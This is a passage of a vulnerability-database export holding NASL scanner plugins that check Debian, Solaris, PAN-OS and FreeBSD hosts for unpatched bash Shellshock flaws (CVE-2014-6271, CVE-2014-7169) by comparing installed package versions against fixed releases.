script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"bash on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (wheezy), these problems have been fixed in\nversion 4.2+dfsg-0.1+deb7u3.\n\nWe recommend that you upgrade your bash packages.\");\n script_tag(name:\"summary\", value:\"Tavis Ormandy discovered that the patch applied to fix CVE-2014-6271 released in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was\nincomplete and could still allow some characters to be injected into\nanother environment (CVE-2014-7169\n). With this update prefix and suffix\nfor environment variable names which contain shell functions are added\nas hardening measure.\n\nAdditionally two out-of-bounds array accesses in the bash parser are\nfixed which were revealed in Red Hat's internal analysis for these\nissues and also independently reported by Todd Sabin.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"bash\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bash-builtins\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bash-doc\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bash-static\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "naslFamily": "Debian Local Security Checks"}

{"nessus": [{"lastseen": "2023-05-28T14:23:26", "description": "SunOS 5.9_x86: bash patch.\nDate this patch was last updated by Sun : Sep/30/14", "cvss3": {}, "published": "2014-10-09T00:00:00", "type": "nessus", "title": "Solaris 9 (x86) : 149080-02", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS9_X86_149080.NASL", "href": "https://www.tenable.com/plugins/nessus/78113", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78113);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Solaris 9 (x86) : 149080-02\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 149080-02\");\n script_set_attribute(attribute:\"description\", value:\n\"SunOS 5.9_x86: bash patch.\nDate this patch was last updated by Sun : Sep/30/14\");\n script_set_attribute(attribute:\"see_also\", value:\"https://getupdates.oracle.com/readme/149080-02\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/2014/09/cve-2014-6271/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.oracle.com/patch/entry/solaris_idrs_available_on_mos\");\n script_set_attribute(attribute:\"see_also\", value:\"https://getupdates.oracle.com/readme/149080-02\");\n script_set_attribute(attribute:\"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Solaris Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Solaris/showrev\")) audit(AUDIT_OS_NOT, \"Solaris 10 or earlier\");\n\nif (solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"149080-02\", obsoleted_by:\"\", package:\"SUNWbashS\", version:\"11.9.0,REV=2002.03.02.00.30\") < 0) flag++;\nif (solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"149080-02\", obsoleted_by:\"\", package:\"SUNWbash\", version:\"11.9.0,REV=2002.03.02.00.30\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:23:14", "description": "The remote host is running a version of Palo Alto Networks PAN-OS prior to 5.0.15 / 5.1.10 / 6.0.6 / 6.1.1. It is, therefore, affected by a command injection vulnerability in GNU Bash known as Shellshock, which is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system.", "cvss3": {}, "published": "2014-10-20T00:00:00", "type": "nessus", "title": "Palo Alto Networks PAN-OS < 5.0.15 / 5.1.x < 5.1.10 / 6.0.x < 6.0.6 / 6.1.x < 6.1.1 Bash Shell Remote Code Execution (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:paloaltonetworks:pan-os"], "id": "PALO_ALTO_PAN-SA-2014-0004.NASL", "href": "https://www.tenable.com/plugins/nessus/78587", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78587);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Palo Alto Networks PAN-OS < 5.0.15 / 5.1.x < 5.1.10 / 6.0.x < 6.0.6 / 6.1.x < 6.1.1 Bash Shell Remote Code Execution (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Palo Alto Networks PAN-OS\nprior to 5.0.15 / 5.1.10 / 6.0.6 / 6.1.1. It is, therefore, affected\nby a command injection vulnerability in GNU Bash known as Shellshock,\nwhich is due to the processing of trailing strings after function\ndefinitions in the values of environment variables. This allows a\nremote attacker to execute arbitrary code via environment variable\nmanipulation depending on the configuration of the system.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://securityadvisories.paloaltonetworks.com/Home/Detail/24\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PAN-OS version 5.0.15 / 5.1.10 / 6.0.6 / 6.1.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:paloaltonetworks:pan-os\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Palo Alto Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"palo_alto_version.nbin\");\n script_require_keys(\"Host/Palo_Alto/Firewall/Version\", \"Host/Palo_Alto/Firewall/Full_Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\napp_name = \"Palo Alto Networks PAN-OS\";\nversion = get_kb_item_or_exit(\"Host/Palo_Alto/Firewall/Version\");\nfull_version = get_kb_item_or_exit(\"Host/Palo_Alto/Firewall/Full_Version\");\nfix = NULL;\n\n# Ensure sufficient granularity.\nif (version !~ \"^\\d+\\.\\d+\") audit(AUDIT_VER_NOT_GRANULAR, app_name, full_version);\n\nif (version =~ \"^6\\.1($|[^0-9])\")\n fix = \"6.1.1\";\nelse if (version =~ \"^6\\.0($|[^0-9])\")\n fix = \"6.0.6\";\nelse if (version =~ \"^5\\.1($|[^0-9])\")\n fix = \"5.1.10\";\nelse\n fix = \"5.0.15\";\n\n# Compare version to fix and report as needed.\nif (ver_compare(ver:version, fix:fix, strict:FALSE) == -1)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + full_version +\n '\\n Fixed versions : ' + fix +\n '\\n';\n security_hole(extra:report, port:0);\n }\n else security_hole(0);\n\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, app_name, full_version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:22:37", "description": "SunOS 5.9: bash patch. \n\nDate this patch was last updated by Oracle : Sep/26/14", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Solaris 9 (sparc) : 149079-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS9_149079-01.NASL", "href": "https://www.tenable.com/plugins/nessus/77911", "sourceData": "#%NASL_MIN_LEVEL 70300\n# @DEPRECATED@\n#\n# This script has been deprecated by solaris9_149079.nasl.\n#\n# Disabled on 2014/10/13.\n#\n\n#\n# (C) Tenable Network Security, Inc.\n#\n\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77911);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n\n script_name(english:\"Solaris 9 (sparc) : 149079-01\");\n script_summary(english:\"Check for patch 149079-01\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is missing Oracle Security Patch number 149079-01\");\n script_set_attribute(attribute:\"description\", value:\n\"SunOS 5.9: bash patch. \n\nDate this patch was last updated by Oracle : Sep/26/14\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/2014/09/cve-2014-6271/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.oracle.com/patch/entry/solaris_idrs_available_on_mos\");\n script_set_attribute(attribute:\"see_also\", value:\"https://getupdates.oracle.com/readme/149079-01\");\n script_set_attribute(attribute:\"solution\", value:\"You should install this patch for your system to be up-to-date.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Pure-FTPd External Authentication Bash Environment Variable Code Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\", \"Host/Solaris/pkginfo\");\n\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"This plugin has been deprecated. Refer to plugin #78112 (solaris9_149079.nasl) instead.\");\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Solaris/showrev\")) audit(AUDIT_OS_NOT, \"Solaris 10 or earlier\");\nif (!get_kb_item(\"Host/Solaris/pkginfo\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"149079-01\", obsoleted_by:\"\", package:\"SUNWbash\", version:\"11.9.0,REV=2002.03.02.00.35\") < 0) flag++;\nif (solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"149079-01\", obsoleted_by:\"\", package:\"SUNWbashS\", version:\"11.9.0,REV=2002.03.02.00.35\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:29:27", "description": "Tavis Ormandy discovered that the patch applied to fix CVE-2014-6271 released in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was incomplete and could still allow some characters to be injected into another environment (CVE-2014-7169 ). With this update prefix and suffix for environment variable names which contain shell functions are added as hardening measure.\n\nAdditionally two out-of-bounds array accesses in the bash parser are fixed which were revealed in Red Hat's internal analysis for these issues and also independently reported by Todd Sabin.", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Debian DSA-3035-1 : bash - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:bash", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-3035.NASL", "href": "https://www.tenable.com/plugins/nessus/77882", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3035. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77882);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"DSA\", value:\"3035\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Debian DSA-3035-1 : bash - security update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Tavis Ormandy discovered that the patch applied to fix CVE-2014-6271\nreleased in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was\nincomplete and could still allow some characters to be injected into\nanother environment (CVE-2014-7169 ). With this update prefix and\nsuffix for environment variable names which contain shell functions\nare added as hardening measure.\n\nAdditionally two out-of-bounds array accesses in the bash parser are\nfixed which were revealed in Red Hat's internal analysis for these\nissues and also independently reported by Todd Sabin.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=762760\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=762761\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2014-6271\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2014-7169\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/wheezy/bash\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.debian.org/security/2014/dsa-3035\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the bash packages.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 4.2+dfsg-0.1+deb7u3.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"bash\", reference:\"4.2+dfsg-0.1+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bash-builtins\", reference:\"4.2+dfsg-0.1+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bash-doc\", reference:\"4.2+dfsg-0.1+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bash-static\", reference:\"4.2+dfsg-0.1+deb7u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:21:58", "description": "Chet Ramey reports :\n\nUnder certain circumstances, bash will execute user code while processing the environment for exported function definitions.\n\nThe original fix released for CVE-2014-6271 was not adequate. A similar vulnerability was discovered and tagged as CVE-2014-7169.", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "nessus", "title": "FreeBSD : bash -- remote code execution vulnerability (71ad81da-4414-11e4-a33e-3c970e169bc2) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:bash", "p-cpe:/a:freebsd:freebsd:bash-static", "p-cpe:/a:freebsd:freebsd:linux_base-c6", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_71AD81DA441411E4A33E3C970E169BC2.NASL", "href": "https://www.tenable.com/plugins/nessus/77836", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2020 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77836);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"FreeBSD : bash -- remote code execution vulnerability (71ad81da-4414-11e4-a33e-3c970e169bc2) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Chet Ramey reports :\n\nUnder certain circumstances, bash will execute user code while\nprocessing the environment for exported function definitions.\n\nThe original fix released for CVE-2014-6271 was not adequate. A\nsimilar vulnerability was discovered and tagged as CVE-2014-7169.\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.gnu.org/archive/html/bug-bash/2014-09/msg00081.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/oss-sec/2014/q3/690\");\n # https://vuxml.freebsd.org/freebsd/71ad81da-4414-11e4-a33e-3c970e169bc2.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1ec4245a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:bash-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux_base-c6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"bash>3.0<=3.0.17\")) flag++;\nif (pkg_test(save_report:TRUE, 